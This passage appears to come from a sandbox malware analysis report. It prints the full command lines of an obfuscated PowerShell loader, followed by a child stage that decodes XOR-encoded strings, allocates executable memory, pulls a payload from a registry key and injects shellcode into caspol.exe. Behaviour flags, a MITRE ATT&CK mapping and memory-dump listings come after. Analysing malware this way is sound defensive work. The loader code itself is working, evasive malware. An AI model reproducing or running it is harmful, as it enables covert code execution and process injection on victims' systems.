Ve`$SmSSieCokTisSprViaNedAfeHotAm1Te0Ic6Mu2Un;un`$OvSSteTrkTosSurUsapadClePatSm1Jo0Sp6Me3An An=Fr KrHChTRiBFo Un'Sa4He9Ld3RyERr0Os1Le0Ud4Ne0Gl9Do1SkEPa0St2Ko0No0Di0In0Ja0Se8En1PrFse0St8Os1MuEFr5lyFNe5ReFPr5AaDBr4No3So2Fa9Ov0St8Se0WhBTr0An4no0Ge3sk0Di8Dr2SyEDe0Bj2Dr0Fo3Fj1BrERo1Pi9Sp1StFPa1Sf8Ra0ImESt1Ma9An0fr2Ne1CoFHe4Sn5Li4Gi9Li1PhESk1FaDSi0Re2Hu1ElFSt1Pi9Re1StEov0Un0Re0FrCIn0Ag3ko0Li9ov0Ma8Di0tr3du1MaEUp5PiBBe4Af1Sq4InDSk3Un6Tr3FoEFi1Zu4En1ChEFo1ki9Co0Ku8sm0Tu0Ob4fu3Un3LiFRa0De8Ko0MaBOv0Ga1Le0Ap8St0SaEfo1Fu9Po0ch4Ce0No2No0Pi3Ko4Sk3St2EaESy0BuCOp0Hy1Re0Ov1Ta0Fo4So0Lg3My0EaAfl2GrELu0Ro2St0En3De1SyBSa0Db8Mi0Bi3Re1Pa9Ha0Rn4Ep0Sk2Si0Be3St1LoEDr3In0al5Am7Ss5Rh7Ev3UgEUn1Me9Go0PoCAk0Gt3Dr0Pr9Af0ArCCl1DiFCy0Un9Ef4pr1Rn4ChDZo4Ta9Ch0UrBJa1PoFTo0To8Un0Ac9Be0Fo8Tr1UmFGt0Et4De0GoECo0La2Om4Ko4Co4Op3br3ToEPr0St8El1Am9hi2Di4Da0Op0De1heDPe0Pa1En0De8pa0In0Rn0Fo8co0Af3Po1Te9bl0MeCpy1fo9Ho0Un4Ba0Ga2la0Ad3Af2AcBTh0Vu1St0AcCDo0BeAAr1BuEMo4to5Ca4pr9Cu1UnEGa1PoDNe0Ob2nr1EnFHa1Er9Hy1exEfe0Br0Ta0PhCSl0fi3Gr0Ro9De0Mo8Ta0Om3Li1LaEAf5UrATi4Co4Pr'Id;Fo&Wo(Av`$FoBAuaNorKvoVrtKohUneHarCemSkoStgSkrSkaUnpHehBe7Ud)Bo Ye`$BeSIneMekGrsParudaFodAveSytLe1Ov0Bi6Er3Am;Ou`$OpSOmeAdkArsWardiaBodReeAgtBu1Ch0Ra6Di4Re ov=Di OpHKaTPoBMo Un'He4ac9En3TiESm0Je1Im0An4Sk0Sl9Pe1DrERe0Fr2El0In0Du0Ap0Fi0So8Sk1UhFNi0Ad8Un1DoENi5TiFMa5InFSu5LiDMe4Hy3af2Un9Sp0Sp8Yd0GnBAf0So4So0Mi3Ba0Ud8As2Un0Su0Pr8Yi1Vi9Tj0Av5Qu0pi2Au0Tu9Co4In5Ga4Ce9Om2buFEx0SuCHv1TyFMi0Rn2Fr1Gu9Ca0Be5Ma0Su8An1GrFre0Uu0An0fi2Co0BaAPs1SeFBa0TeCPr1BrDUn0Wo5Bu5BiFYn4Fe1Fo4SuDso4Mi9Di2NoFEk0VeCGe1LaFme0In2Sy1As9Sk0Th5Ma0Ad8Ri1BaFMo0ga0Un0po2Ga0ObAPa1SaFMi0BeCCa1AbDDa0Le5Re5brEIn4Na1ty4StDMe4re9Un0SuAEc1Ne8an0Sa1Vo0Je9Sp0BiCYo0Pr1Re0Sy9Kr0Un8rn1FiFAr0Tr0In0StCTp0Se1Sy0Bi8No1unFAm0Fr3Tr0Rg8Ro4Be1Kb4SiDLa4Ga9ek0MeBFo1TiFCi0Tn8Pa0Dr9El0rg8Vr1PaFSp0Mi4De0FeEcr0Ha2Fo4Fj4La4In3im3SlEBo0Bl8Ni1Cu9Em2Fu4Mu0Pr0Fo1DdDDe0Co1Su0Ta8Nu0So0Fl0Re8Fe0In3Me1Mi9Ac0FaCLe1Pa9Ak0Me4Sr0Fi2Ko0Ku3Ti2GlBka0Lb1Pe0SaCNd0TiADi1AnEBe4ac5Un4No9Li1baEAs1TrDUn0To2Se1TiFpa1to9Si1KoETr0Na0In0UnCUn0tv3Pr0Ef9De0Fr8No0Fo3Co1DeEAm5DiAUn4Ny4En'di;Un&Kr(In`$MoBPraAnrVioMutfahSaeSprHvmtaoUngChrGraGepsyhRe7pr)Fr So`$ViSfeevakAksHerDiaKedSleHytPo1Tu0Bo6Un4Sa;In`$BoSCaeKokYeshvrHeaDrdafeEntPo1At0Re6In5Se Dy=Fr PaHstTUnBVa No'Ma1PiFRe0Fa8Gr1Kn9Ba1Mo8Ge1SyFVa0Li3Th4StDDa4Do9Oc3CoEen0Un1Re0Un4Vi0Sd9Ba1DuESk0Ar2In0Pa0No0Al0Fo0Sp8sh1PrFUd0To8Au1GlEbr5AsFMu5puFSk5LaDLb4Un3Vi2UdEOp1SkFPh0Sy8Pr0HeCIn1Mu9Ta0Fo8Te3Pu9Re1Ka4sh1NoDVa0Re8Re4Pa5Gl4Sk4Be'Re;Dy&Th(Br`$DeBMuaForTeoAntFthTreSurDrmFloCagZurTuaDipDohBl7Su)Fo Ig`$TaSHeeCikResTirteaCadRseEntSi1Tr0Ha6To5Cn Ke Mi Pe;La}Pa`$MuUJanFidMyesirDesRotSkaUntLoeCamUneAmnWatSyeHanDasBr ti=Re BiHUnTIsBtr Hj'Fe0Ub6so0Bu8Hy1EmFfl0Bo3el0No8An0Hi1Ch5VeESj5FiFMi'Te;No`$HoSMaeGikMasEgrApaDidEseSqtFo1To0Ti6Te6ca Li=Ka OvHPoTOrBPs La'Ci4Fe9Sp0RnFSu0saCSv0Mi6Da1Ma9Va0Th8st1SwFSt0ma4Ko0Sh2vu0Wi1Re0Aj2Em0InAGl1ShEDe4BrDBl5Gr0Ho4umDHa3Ny6ud3tvELa1Se4Ud1coEAd1Cr9Co0Pa8Co0tr0Ch4Ul3Kl3HjFNo1Ab8Ha0Pa3Ke1Ud9Ra0Ud4He0Te0Aa0Br8So4Un3As2Li4In0Mo3Tr1Sk9Af0Sk8Bo1CaFSh0Bu2Re1OpDFr3NoEOv0De8Os1TeFTi1DaBCr0Ko4Am0InEBi0Va8He1CiEKu4Tr3Ag2Or0Re0PdCUn1ToFKe1RaECo0Ba5Du0VeCFa0Pr1Up3Ti0Ra5Au7Id5Ca7Ca2DeACh0Af8Pa1Le9un2Ud9Un0Th8Di0Ov1Cu0Pu8we0FrAfo0UnCMn1Br9bo0Re8ex2SrBOd0La2Tr1DyFKr2LaBco1en8Po0ri3Cr0MrEDi1Cy9Su0Ve4Oi0In2Im0Tu3Qu3DeDPs0Hy2Bo0Fl4dr0In3He1Ex9sa0Be8Sk1NoFLa4Ka5Ru4Sa5Un0MaBSu0Ka6su1BlDUd4naDLi4El9Sn3To8Sk0Bu3Se0Pu9Af0Di8El1MaFPa1BrEAp1St9Ma0OrCFa1Of9In0Ri8Od0Hu0Sk0Re8Ch0sc3Tr1La9Ls0Li8So0Pi3Al1BrEMo4HaDLo4Tw9Sd2DiFan0brCSo1ReFFu0Me2Sk1Be9Sm0He5Co0Fu8Fu1BaFPa0Un0Cl0Ka2Su0HyAMa1goFEl0RoCAd1SkDFa0St5Ba5Go9Fr4Du4So4Kl1Ug4SiDDi4Ca5Ma2FrANo2Cu9st3dr9Un4ThDAc2UnDFa4Sa5Re3Va6So2Co4De0Hy3Ge1Ko9On3NoDAm1Po9Tr1ViFSe3Sk0Fu4Ka1In4BoDSk3Gl6Ud3et8He2Un4Ud0fl3Ra1Tr9Dr5SkEPu5MaFbr3Tr0Pa4Sy1su4InDGs3Ra6Sc3We8In2Rs4Vi0er3No1Se9fi5UlEKi5GaFFo3Aa0Sy4Ud1Pa4OrDFo3Sm6Pe3Or8Cy2Go4Kr0Vi3Lo1Tu9In5biEOv5ViFSu3Rv0Ga4Fi4Ex4HeDUn4Co5Hj3Pu6Ud2ny4Pr0Ma3le1Vi9Fl3EpDHe1Mi9Tr1LiFOc3Fo0En4Ud4Fu4Sh4Ko4Ci4Fn'Ek;Bu&Ka(Af`$DaBSpaInrGaoUmtRehSpeAfrStmKooSugEnrDoaFlpLehCo7Pr)Ho Re`$AfSPeekokPtsCyrtiaBadUneBatLy1Kr0In6Ma6Af;Ha`$PejVeeCuaRemUneDisUn Sh=Ka MofvekStpEs Al`$UnBDeaScrGeoRetFlhNoeCerTemWhoKogFlrGraUppGshDa5Ti Sv`$juBbeaRerSuoNotschFeeTrrpemHeoIngMorNoaKopEnhAk6Re;Br`$LeSBleHaktisAdrSvaOmdNeeKatFr1Si0Te6Ja7Co dr=No SiHAfTNeBMa Va'Bo4Fi9Vr3ge9Un0Pl4Ov0As1Op0Re1Se0UnARl1KvEne0AlFPe0st9Sp0Se8Bo0Th3Po5UnELy4SvDPr5Fr0So4FiDTe4Ov9St0TrFsy0FlCTi0An6Sl1Re9Om0So8Ta1SeFVi0No4Fr0Ba2Bu0Ch1Se0Om2Fo0ElADr1UdETu4Tr3Aa2Sa4Ka0Sy3ba1spBMi0At2La0Pr6Fl0Pu8Br4Ge5Ly3In6Ti2Ll4Dy0Kv3Tr1Su9Sa3FaDUs1Ch9Pe1UmFfr3Su0Me5Ba7Ov5Sc7Hj3Bo7Tr0An8Dd1maFFi0fo2Po4sa1Sa4FlDFr5baBRe5Di8Af5SpBSe4Bu1Ba4NeDSv5ReDKa1Ab5La5FrEUr5raDGr5ReDEx5DiDUn4He1Do4OkDQu5UdDTr1Un5Re5Du9Is5SoDNd4Fo4Re'af;Se&Se(Sk`$LiBVaaMarPaoRetSahcoePlrAnmPaoPogprrKaaBepTthDm7Tu)Ky Se`$RbSSaepakCisHorOcaGrdineCltJu1Ba0Sc6Ga7Bo;De`$CaSEmeLukNosVarHeaPadgieAstMa1In0in6an8Gu St=Co DaHOfTDuBSa Fi'Fi4Sl9Sk2Tr9ag0Ad8St0OrCIn1Va9Ki0Za5Bi1UnAEm0So2pr1PrFAn0mo0Au4RoDTe5To0Ll4LeDDr4Ha9Pl0UnFSa0InCSt0Wo6Fi1Ca9Sa0Kl8Ur1ixFHj0Go4St0Sk2sq0fi1Gl0Un2Sa0AkABa1HoEHa4St3Gr2Gu4ho0Ko3Dr1StBPe0Re2Eu0Ou6Aa0Bu8Da4Su5Re3Au6aa2Sk4Fl0Pr3Ln1Eu9Sa3EmDRe1Sk9ly1UnFTh3Bu0Er5Re7Te5Ar7Ak3Im7al0St8ko1SiFFa0Ca2Af4Ud1Sh4TeDPe5Mt9Pr5OsBOu5IlFSe5unDAn5AkBWo5Di4Dr5CoADo5HuBBe4Je1Re4ToDMy5alDTj1Di5Tr5inEHu5NoDKo5BaDUd5ThDUv4Ub1Th4MaDMa5ErDUp1Fr5Pl5Gr9Fo4Ma4Ti'Wi;Mi&Ba(In`$TiBVoaLirOvoIltFohSkeHorscmAmobrgMeranaGypChhIl7Fo)Fr Fo`$ElSCheUukEnsKirCaaLadJaeAptUn1My0In6sk8Ak;Gr`$SaHpaiEfnGvdOpsDi=In(SkGTeeSktRh-SkIRetEleTrmbrPunrOpoBrpCheCarRgtmeyMe Ch-SmPreaGrtThhBa In'GrHBeKEkCDeUAf:Go\SaKSioUdmLamKauMenreiFoeDrrIreTi\EkASpsEgsAroSkcIniToafrtFyeKadSg'Ra)Er.ReTQuaDykMdkUneRelHjeGltSu;Un`$UfSTyeRekLasRerAcaEndEceemtRh1Da0Ts6Re9st Af=en MoHLyTTiBFo Wh'pl4Du9To3BiEUr0In8Re0Gl6Bu1PiESp1StFOb0UkCAr0Ps9Hy0Hj8Un1Ng9Ko5unCNa5SaDLi5BuBGe4LeDNi5sm0In4InDEj3Ep6Dr3DdERe1Hu4Qu1FoECh1No9Et0Bl8Re0Di0Op4Re3Pr2JoEAm0An2Ve0Au3Sl1peBMi0Be8ke1FlFmo1Li9My3Dr0Lu5pl7Tr5Ha7So2AoBMi1DiFun0No2Va0Ar0Sn2FoFse0AfCPr1KaESp0Kn8Lu5BaBSk5Bo9Se3CoEBr1Ho9Br1CaFGr0Bl4Ko0dy3tr0FoASt4Fe5Re4Ko9Lt2Up5Di0Ab4fl0Ri3Ze0Ta9La1ToEEk4Uf4Fo'Na;Ka&Oe(Ti`$NeBLeasurFaoAptDihSceBarRemPioRagSorPaaMapRuhMe7Ad)Un Sn`$CaSUneCekSasObrMeaBadBrenotDi1St0Fi6st9Ra;Ta`$FrHViiGrnEadFdsMe0af Sp=mr DiHSpTSuBPa Or'Ue3Ra6Ma3TaEUn1Ir4Ba1OnEEl1Sp9Ta0Su8Be0Ex0vr4Un3Pe3PeFOu1An8Su0Or3Ol1Ta9ho0In4Si0Ho0Sk0sa8Be4Lo3Pt2Kv4Ve0De3Is1Dy9Su0Dm8Pr1NoFRi0cu2De1ObDTi3UnELi0Af8Ra1FrFaf1AsBPr0Sn4De0HiECo0Ex8Om1UnEKa4ov3Pu2De0Ce0LeCSy1TrFAd1UdENo0Pr5Cr0KlCOv0Ma1Um3un0Sn5Be7Te5cl7Pr2FaEBr0Ju2Pa1DrDGe1Sa4An4Ut5Wo4Sk9St3TyEWe0Tr8Tr0Ma6Ho1SlEGr1SoFTh0ArCet0Ly9sa0Ho8In1Re9st5EvCRe5ReDSe5ReBaf4Sp1ch4AsDOp5DuDMi4Ud1An4BuDRe4SyDEk4Ov9Si3Ou9Eo0ef4Su0Sg1He0st1Co0PiANo1EkEnb0LeFRh0Py9Sl0Mi8So0Ti3Am5ImEIn4Fi1pe4CoDUd5MiBOr5Kn8Tr5NuBPr4Li4Ek'Ov;St&Te(Un`$LiBLiaRorHaosttOphSyeJorRemAloGngKurGeaSupFahGu7Jo)Re Te`$ArHMoiHynUndUnsPr0Su;Tr`$GrNSceLuuMarJeibeaOptErrNoySn=El`$SkSFleUdkPrsForLiaGadAfeFetri1Pr0Si6Hi.BrcAdoFruAnnSptFe-Af6La5un6Bl;My`$BoHpiiVlnDadResNe1Co Sy=Hi DkHDyTSrBTa Te'My3Oc6In3TaEKi1By4ir1TrERe1Hy9Se0Re8De0Re0Lu4Ra3Sk3BaFSk1Bo8Dj0Ga3Ge1Ho9re0Di4Lo0An0Hj0Ap8Ro4Se3Te2Ra4Sc0Mu3Vo1Fr9So0Pi8se1UnFUn0Th2Ch1KlDSu3agEDi0fo8Re1HaFSa1hjBRa0Ba4Te0ToEAa0Hj8Br1VaEKa4Co3Pa2Ps0ba0AnCAc1StFOr1TeECo0No5Be0RnCDe0Co1Lt3Ep0Mi5fo7Af5St7Ti2ViEFo0Ki2Ku1FoDlg1Le4Gi4St5Fl4Cy9Mo3CoEDr0No8Pr0Ga6Ku1BoEKn1FrFZa0BaCIn0Ps9Ak0Li8Du1Br9Su5SeCOl5BrDFu5TrBNi4De1Sh4KaDKv5EsBTy5Va8la5ReBmu4Rn1Gn4InDTr4Ha9Un2Ny9Ar0Cr8Sa0FiCBr1Re9Bu0Ph5Te1TrAKi0af2Xe1GrFJi0On0Tr4Ru1Fr4GuDOm4me9Da2Po3Si0cr8Di1Ca8An1grFKa0Un4Ma0InCSo1Ch9Li1InFNe1Un4ra4Un4Re'Un;Kr&Hu(An`$imBCoaOmrDroCotEchUnePerLumTeoBogUnrReaMapGehAb7Pl)Sk Bl`$GiHCaiUbnMadEgsFa1De;Ch`$faHPeiilnredSjsEn2Fi ka=Bi BuHHuTJoBCy Hy'Pl4Pr9Sp2UnETr0Ar5Tr0Op2Do0Br1Pe0Au8Ku0Fo1Pi0Fo4Un1In9St0Ef5Ro4RuDSe5Pa0Dy4MiDAd3Ti6He3BiEKj1Fo4To1LiESk1Re9Co0Nu8Ha0Ej0De4Bo3Hj3skFKo1Ge8La0Ga3Sm1Ri9Ha0Un4Ve0Ac0Cy0Fo8Ti4Un3No2Pe4Ke0Re3Pe1Fo9su0Ne8Fr1taFTj0Of2Bo1TrDJu3OuEKi0Me8Af1CyFHe1SaBAn0Ov4Mi0TiEIn0Ve8Ko1ToEEm4Di3Fa2Ch0Su0LsCef1PsFNe1SuEAa0Ju5Ma0HeCSi0Kr1Tr3ma0In5Ru7Be5re7da2NeANo0Kr8cy1In9Ca2Fe9Pa0Fo8Ad0Ps1Fr0Un8Sp0KaAPy0UdCPo1Sp9Co0Ob8Sl2LuBov0Ko2Sa1phFBr2opBPl1Fa8Sm0fl3Sk0crEMa1Da9Op0St4Mi0Un2Gr0Ka3Er3ElDPh0Lo2Ce0Pr4No0St3Se1Cl9La0Er8Be1FrFGa4el5Bi4Ta5Mi0PoBKr0Pa6Be1ScDDr4ChDEn4Ps9Pi2pu2Re0Fa0Sp1FlEmo1Ov9St0hy3Bu0Si9Pr0Ud8Ch0Ph1Da0La4Sp0BeACu1AlETh1Br9Gg0Un8De4TaDLe4kv9ep3CoBDe0CaCJu1GaEan0Hy6Ma0Ka2Ox0he0To0HaCUk1di9Un0Se8Se0At3Co4Ex4Sm4Se1ki4SyDSk4In5Do2DrABe2Kr9Hu3Ko9Se4InDBe2HeDPr4Be5Su3Tr6In2Ku4Or0Da3In1Bl9Pr3HaDFa1Ar9Ka1GrFOu3Ib0Te4Ju1Pa4AsDRe3Mi6St2Pl4Sn0Bi3De1Po9Sp3UiDUd1Ti9de1NaFNi3Gl0Va4Ma1ov4IsDTe3Va6Pr2Ac4Ve0Ar3Sn1Fi9Ha3MnDCa1Sy9Fy1AcFDi3Or0Un4te1Pr4UnDRd3Es6Pl2Dh4Su0no3Ph1Tr9Se3FaDSk1St9Br1DyFPi3Es0As4Ud1kr4CaDFu3St6Re2Be4Hy0Al3sh1Un9Co3RyDJo1Un9Pa1SkFPe3Be0Sq4Fi4Ir4EnDKu4Be5Ef3se6Kr2Ud4ma0Ls3Hv1Di9Po3StDBi1Ba9Ov1FeFEx3Sk0Fo4Un4Le4Ne4hj4Ve4Kn'Ko;Te&Lj(Ge`$InBOvaStrHeoFotSahRyererLomDioEmgScrTraSopCehIo7Or)pa Re`$MeHTaiSonAfdDasFo2Ko;Pr`$GaHDuiUlnUndAlsYa3St Pl=Ab AlHStTTyBls ge'Jo4Jo9Li2CoEAm0ka5Kl0Sh2Eu0Af1Ud0Pr8Ko0Ti1Ki0Va4in1Er9Tr0Ne5Ro4dn3Ty2La4Ye0Um3Me1NoBUd0Fa2Re0In6Gr0Ab8Sv4Ap5In4Ho9Fo3Ha9Bl0Kv4Fr0Ex1Pe0Ci1Sq0BeAOv1UnEhj0SoFPo0Ja9Un0Pr8Ph0Er3Sm5prESt4Un1Hy4Sk9Mi2Fl9Bu0Be8Ro0BoCSm1Sa9Fo0Re5Fe1OvAPh0Ma2Sp1GgFDr0Li0Vo4un1vi4Co9Mi0Fo7Gy0Sa8Ko0MuCTr0Sa0Af0Re8Un1TiEBl4As1Te5FuDBe4Di1Bl5MaDDi4To4In'Da;fo&Bi(Wi`$InBLoaBirSpoPatBnhSaeSprScmBaoRegBirInarapHohTa7si)mi Af`$PaHDaiusnLbdDessc3To#Fe;""";;Function Hinds9 { param([String]$Unormaliteters); $Reshipper215 = $Unormaliteters.toCharArray(); For($Rhodanine=2; $Rhodanine -lt $Reshipper215.count-1; $Rhodanine+=(2+1)){ $Energiagenturets115 = $Energiagenturets115 + $Reshipper215[$Rhodanine]; } $Energiagenturets115;}$Myreslugeres0 = Hinds9 'HuISunEmvSaoEpkBreLi-LoEOpxSopRorUfeUbsBosFliStoEmntr ';$Myreslugeres2 = Hinds9 'MasBitCaaVerEttTa-AljDiodibAd ';$Myreslugeres1= Hinds9 $colliens;;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Myreslugeres1 ;}else{&$Myreslugeres0 $Myreslugeres1;};;;"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4776

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Begrebsrammens00 {param([String]$Unormaliteters);For($Rhodanine=2; $Rhodanine -lt $Unormaliteters.Length-1; $Rhodanine+=(2+1)){$Energiagenturets115 = $Energiagenturets115 + $Unormaliteters.Substring($Rhodanine, 1);}$Energiagenturets115;}$Begrebsrammens02 = Begrebsrammens00 'TvISynBevTuoBikBeeTr-inEHaxNopCrrEmeFosAnsEsiPioConPr ';$Begrebsrammens01 = Begrebsrammens00 'Su$BlNTaoBukLakEueHjrPrnDyepesRu[Fi$TiRFihGaoTadBeaLanLeiShnDoeEn/Ka2Ce]Aa De=El Si[FocOroOsnNevOdeEnrChtSa]sp:Go:BiTTuoEmBjoyMotCoeEu(In$alUArnFloGrrPamNoaImliniNotDueTitdieZorUnsXy.CoSKkuAnbHosMetVorAbiGenTogIn(Ud$StRPahAdoArdVraThnFoiSynTeeDi,Tr Ta2Bu)Sa,di Ov1Dr6Ka)da ';Function HTB {param([String]$Unormaliteters);$Nokkernes = New-Object byte[] ($Unormaliteters.Length / 2);For($Rhodanine=0; $Rhodanine -lt $Unormaliteters.Length; $Rhodanine+=2){.($Begrebsrammens02) $Begrebsrammens01;$Nokkernes[$Rhodanine/2] = ($Nokkernes[$Rhodanine/2] -bxor 109);}[String][System.Text.Encoding]::ASCII.GetString($Nokkernes);}$sportsmandens0=HTB '3E141E19080043090101';$sportsmandens1=HTB '20040E1F021E020B19433A04035E5F4338031E0C0B08230C19041B082008190502091E';$sportsmandens2=HTB '2A08193D1F020E2C09091F081E1E';$sportsmandens3=HTB '3E141E190800433F18031904000843240319081F021D3E081F1B040E081E43250C030901083F080B';$sportsmandens4=HTB '1E191F04030A';$sportsmandens5=HTB '2A0819200209180108250C03090108';$sportsmandens6=HTB '3F393E1D080E040C01230C0008414D250409082F143E040A414D3D180F01040E';$sportsmandens7=HTB '3F180319040008414D200C030C0A0809';$sportsmandens8=HTB '3F080B01080E190809290801080A0C1908';$sportsmandens9=HTB '2403200800021F14200209180108';$Barothermograph0=HTB '2014290801080A0C190839141D08';$Barothermograph1=HTB '2E010C1E1E414D3D180F01040E414D3E080C010809414D2C031E042E010C1E1E414D2C1819022E010C1E1E';$Barothermograph2=HTB '24031B020608';$Barothermograph3=HTB '3D180F01040E414D250409082F143E040A414D23081A3E010219414D3B041F19180C01';$Barothermograph4=HTB '3B041F19180C012C0101020E';$Barothermograph5=HTB '0319090101';$Barothermograph6=HTB '23193D1F0219080E193B041F19180C01200800021F14';$Barothermograph7=HTB '242835';$Barothermograph8=HTB '31';$Omstndeligste=HTB '383E283F5E5F';$Vaskomaten=HTB '2E0C01013A040309021A3D1F020E2C';function fkp {Param ($Forhandlerbetingelser, $slabberaser) ;$Seksradet1060 =HTB '492F1F081B050800000801040A0508094D504D45362C1D1D2902000C04033057572E181F1F0803192902000C0403432A08192C1E1E08000F0104081E45444D114D3A05081F0840220F07080E194D164D4932432A01020F0C012C1E1E08000F01142E0C0E05084D402C03094D49324321020E0C19040203433E1D01041945492F0C1F021905081F00020A1F0C1D05554436405C3043281C180C011E45491E1D021F191E000C030908031E5D444D1044432A081939141D0845491E1D021F191E000C030908031E5C44';&($Barothermograph7) $Seksradet1060;$Seksradet1065 = HTB '4928061E191F0C0F081B04010104030A081F1E4D504D492F1F081B050800000801040A050809432A081920081905020945491E1D021F191E000C030908031E5F414D3639141D083630304D2D45491E1D021F191E000C030908031E5E414D491E1D021F191E000C030908031E594444';&($Barothermograph7) $Seksradet1065;$Seksradet1061 = HTB '1F0819181F034D4928061E191F0C0F081B04010104030A081F1E4324031B020608454903180101414D2D45363E141E190800433F18031904000843240319081F021D3E081F1B040E081E43250C030901083F080B304523081A40220F07080E194D3E141E190800433F18031904000843240319081F021D3E081F1B040E081E43250C030901083F080B454523081A40220F07080E194D2403193D191F44414D45492F1F081B050800000801040A050809432A081920081905020945491E1D021F191E000C030908031E5844444324031B020608454903180101414D2D45492B021F050C030901081F0F081904030A08011E081F44444444414D491E010C0F0F081F0C1E081F4444';&($Barothermograph7) $Seksradet1061;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $frederico,[Parameter(Position = 1)] [Type] $guldaldermalerne = [Void]);$Seksradet1062 = HTB '493E0104091E020000081F081E5F5F5D4D504D362C1D1D2902000C04033057572E181F1F0803192902000C04034329080B0403082914030C00040E2C1E1E08000F0114454523081A40220F07080E194D3E141E190800433F080B01080E19040203432C1E1E08000F0114230C000845491E1D021F191E000C030908031E554444414D363E141E190800433F080B01080E190402034328000419432C1E1E08000F01142F18040109081F2C0E0E081E1E3057573F1803444329080B0403082914030C00040E20020918010845491E1D021F191E000C030908031E54414D490B0C011E08444329080B04030839141D0845492F0C1F021905081F00020A1F0C1D055D414D492F0C1F021905081F00020A1F0C1D055C414D363E141E1908004320180119040E0C1E19290801080A0C19083044';&($Barothermograph7) $Seksradet1062;$Seksradet1063 = HTB '493E0104091E020000081F081E5F5F5D4329080B0403082E02031E191F180E19021F45491E1D021F191E000C030908031E5B414D363E141E190800433F080B01080E19040203432E0C010104030A2E02031B0803190402031E3057573E190C03090C1F09414D490B1F0809081F040E0244433E081924001D0108000803190C190402032B010C0A1E45491E1D021F191E000C030908031E5A44';&($Barothermograph7) $Seksradet1063;$Seksradet1064 = HTB '493E0104091E020000081F081E5F5F5D4329080B04030820081905020945492F0C1F021905081F00020A1F0C1D055F414D492F0C1F021905081F00020A1F0C1D055E414D490A1801090C0109081F000C01081F0308414D490B1F0809081F040E0244433E081924001D0108000803190C190402032B010C0A1E45491E1D021F191E000C030908031E5A44';&($Barothermograph7) $Seksradet1064;$Seksradet1065 = HTB '1F0819181F034D493E0104091E020000081F081E5F5F5D432E1F080C190839141D084544';&($Barothermograph7) $Seksradet1065 ;}$Understatementens = HTB '06081F0308015E5F';$Seksradet1066 = HTB '490F0C0619081F040201020A1E4D504D363E141E190800433F18031904000843240319081F021D3E081F1B040E081E43200C1F1E050C013057572A0819290801080A0C19082B021F2B18030E190402033D02040319081F45450B061D4D49380309081F1E190C19080008031908031E4D492F0C1F021905081F00020A1F0C1D055944414D452A29394D2D45362403193D191F30414D36382403195E5F30414D36382403195E5F30414D36382403195E5F30444D45362403193D191F30444444';&($Barothermograph7) $Seksradet1066;$jeames = fkp $Barothermograph5 $Barothermograph6;$Seksradet1067 = HTB '49390401010A1E0F0908035E4D504D490F0C0619081F040201020A1E4324031B02060845362403193D191F30575737081F02414D5B585B414D5D155E5D5D5D414D5D15595D44';&($Barothermograph7) $Seksradet1067;$Seksradet1068 = HTB '4929080C19051A021F004D504D490F0C0619081F040201020A1E4324031B02060845362403193D191F30575737081F02414D595B5F5D5B545A5B414D5D155E5D5D5D414D5D155944';&($Barothermograph7) $Seksradet1068;$Hinds=(Get-ItemProperty -Path 'HKCU:\Kommuniere\Associated').Takkelet;$Seksradet1069 = HTB '493E08061E1F0C0908195C5D5B4D504D363E141E190800432E02031B081F193057572B1F02002F0C1E085B593E191F04030A4549250403091E44';&($Barothermograph7) $Seksradet1069;$Hinds0 = HTB '363E141E190800433F18031904000843240319081F021D3E081F1B040E081E43200C1F1E050C013057572E021D1445493E08061E1F0C0908195C5D5B414D5D414D4D49390401010A1E0F0908035E414D5B585B44';&($Barothermograph7) $Hinds0;$Neuriatry=$Seksradet106.count-656;$Hinds1 = HTB '363E141E190800433F18031904000843240319081F021D3E081F1B040E081E43200C1F1E050C013057572E021D1445493E08061E1F0C0908195C5D5B414D5B585B414D4929080C19051A021F00414D492308181F040C191F1444';&($Barothermograph7) $Hinds1;$Hinds2 = HTB '492E05020108010419054D504D363E141E190800433F18031904000843240319081F021D3E081F1B040E081E43200C1F1E050C013057572A0819290801080A0C19082B021F2B18030E190402033D02040319081F45450B061D4D4922001E1903090801040A1E19084D493B0C1E0602000C19080344414D452A29394D2D45362403193D191F30414D362403193D191F30414D362403193D191F30414D362403193D191F30414D362403193D191F30444D45362403193D191F30444444';&($Barothermograph7) $Hinds2;$Hinds3 = HTB '492E05020108010419054324031B0206084549390401010A1E0F0908035E414929080C19051A021F00414907080C00081E415D415D44';&($Barothermograph7) $Hinds3#"
3⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4048

C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"
4⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4784

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/4048-144-0x0000000006ED0000-0x0000000006EEA000-memory.dmp

Filesize
104KB

Download
memory/4048-134-0x0000000000000000-mapping.dmp

Download
memory/4048-145-0x0000000007C00000-0x0000000007C96000-memory.dmp

Filesize
600KB

Download
memory/4048-146-0x0000000007B90000-0x0000000007BB2000-memory.dmp

Filesize
136KB

Download
memory/4048-136-0x0000000003050000-0x0000000003086000-memory.dmp

Filesize
216KB

Download
memory/4048-137-0x0000000005CC0000-0x00000000062E8000-memory.dmp

Filesize
6.2MB

Download
memory/4048-138-0x00000000059B0000-0x00000000059D2000-memory.dmp

Filesize
136KB

Download
memory/4048-139-0x0000000005B50000-0x0000000005BB6000-memory.dmp

Filesize
408KB

Download
memory/4048-140-0x0000000005BC0000-0x0000000005C26000-memory.dmp

Filesize
408KB

Download
memory/4048-141-0x0000000006960000-0x000000000697E000-memory.dmp

Filesize
120KB

Download
memory/4048-152-0x0000000077930000-0x0000000077AD3000-memory.dmp

Filesize
1.6MB

Download
